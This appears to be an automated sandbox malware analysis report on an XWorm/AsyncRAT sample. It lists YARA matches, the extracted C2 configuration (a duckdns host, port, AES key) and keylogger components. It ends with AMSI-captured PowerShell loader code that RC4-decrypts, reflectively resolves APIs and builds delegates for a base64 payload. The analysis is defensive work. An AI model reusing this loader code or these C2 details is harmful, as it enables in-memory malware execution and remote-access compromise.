Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["kdke.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"} |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: kdke.duckdns.org |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: 8896 |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: <123456789> |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: <Xwormmm> |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: XWorm V5.6 |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack |
String decryptor: USB.exe |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: Malware configuration extractor |
URLs: kdke.duckdns.org |
Source: xy.ps1 |
String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, XLogger.cs |
.Net Code: KeyboardLayout |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5B923 |
6_2_000001D8A2F5B923 |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5B503 |
6_2_000001D8A2F5B503 |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5BD5B |
6_2_000001D8A2F5BD5B |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5A8DB |
6_2_000001D8A2F5A8DB |
Source: C:\Windows\System32\notepad.exe |
Code function: 6_2_000001D8A2F5C1E3 |
6_2_000001D8A2F5C1E3 |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
Source: C:\Windows\System32\notepad.exe |
Mutant created: NULL |
Source: C:\Windows\System32\notepad.exe |
Mutant created: \Sessions\1\BaseNamedObjects\QEL4wgqwsRH2WthB |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4n4y52un.zpo.ps1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, 
Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('hTofNzZhzulVsFFp+HACplQ9P3ahPBbqw4tkMHSW0m9hYiqrCffLlSJiSDphhyFsTErdQVNi913EVNZvNToD6hL7Drhmt+gm1ZlP4JhK7I13mzQroJyUCK0O4xTM29A+Tkgbr5NiExtYUEcNgI0B/rcApStdz462bPK7Zn65RW7Bv0k1nik9X8g/253l3fRWd9PL/xSBd |